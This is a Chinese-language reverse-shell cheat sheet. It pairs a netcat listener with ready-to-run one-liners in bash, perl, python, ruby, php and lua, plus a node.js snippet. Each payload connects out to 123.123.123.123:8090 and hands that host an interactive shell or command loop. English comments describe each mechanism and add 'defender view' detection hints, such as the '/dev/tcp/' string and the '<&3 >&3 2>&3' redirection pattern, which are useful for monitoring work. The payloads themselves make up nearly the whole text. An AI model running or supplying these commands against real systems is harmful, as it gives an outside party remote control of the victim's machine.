常见的反弹 Shell

服务端

假设服务端 IP 为 123.123.123.123，开放端口 8090 用于监听。以下各示例均由客户端主动向该地址发起出站连接，因此出站流量的过滤与监控是主要的检测点。

# Listener side: netcat waits for one inbound TCP connection on port 8090
# (-l listen, -vv extra verbose, -p local port).
nc -lvvp 8090

客户端

bash

# Starts an interactive bash whose stdout/stderr are redirected to bash's
# /dev/tcp/HOST/PORT pseudo-path, with stdin duplicated from the same descriptor.
# Defender view: /dev/tcp is handled by bash itself, not the filesystem, so the
# string "/dev/tcp/" in audited command lines is a useful detection signal.
bash -i >& /dev/tcp/123.123.123.123/8090 0>&1

perl

# Opens a TCP socket to the host/port, reopens STDIN, STDOUT and STDERR onto it,
# then exec()s /bin/bash -i only if connect() succeeded.
# Defender view: an interactive shell whose three standard descriptors are all
# the same network socket is the behaviour to alert on.
perl -e 'use Socket;$i="123.123.123.123";$p=8090;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'

python

# Connects a TCP socket, duplicates its descriptor onto fds 0, 1 and 2 with
# os.dup2, then runs /bin/bash -i as a child that inherits those descriptors.
# Defender view: look for an interpreter started with -c whose child is a shell
# and whose stdio is a socket rather than a tty or pipe.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("123.123.123.123",8090));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

ruby

# Forks and lets the parent exit, so the child keeps running detached from the
# invoking command. The child reads one line at a time from the socket, runs it
# with IO.popen, and writes the command's output back.
# Defender view: no interactive shell is started here; each received line becomes
# its own short-lived child process of the ruby interpreter.
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("123.123.123.123","8090");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

php

# Opens a socket with fsockopen, then exec()s a shell whose stdin/stdout/stderr
# are redirected to descriptor 3. The descriptor number is hard-coded; the code
# never checks which fd the socket actually received.
# Defender view: the literal "<&3 >&3 2>&3" in a shell command line is a
# recognisable pattern for process-audit rules.
php -r '$sock=fsockopen("123.123.123.123",8090);exec("/bin/bash -i <&3 >&3 2>&3");'

lua

# Requires the 'socket' module (LuaSocket, not part of core Lua), connects a TCP
# client, then runs a shell via os.execute with stdio redirected to a hard-coded
# descriptor 3; the code does not verify that the socket is fd 3.
# Defender view: same "<&3 >&3 2>&3" redirection pattern as the PHP variant.
lua -e "require('socket');require('os');t=socket.tcp();t:connect('123.123.123.123','8090');os.execute('/bin/bash -i <&3 >&3 2>&3');"

node

// Node.js variant: an immediately-invoked function that wires a spawned
// /bin/sh to an outbound TCP connection (host 123.123.123.123, port 8090).
// Defender view: a node process that owns a shell child and an egress socket
// piped to that child's stdio is the behaviour to alert on.
(function(){
    var net = require("net"),
    cp = require("child_process"),
    // The shell is spawned here, before any connection is attempted.
    sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(8090, "123.123.123.123", function(){
        // Runs once the TCP connection is established: data from the socket
        // feeds the shell's stdin; the shell's stdout/stderr go back out.
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    // Returned synchronously, so "Connected" is reported whether or not the
    // connection has completed.
    return "Connected";
})();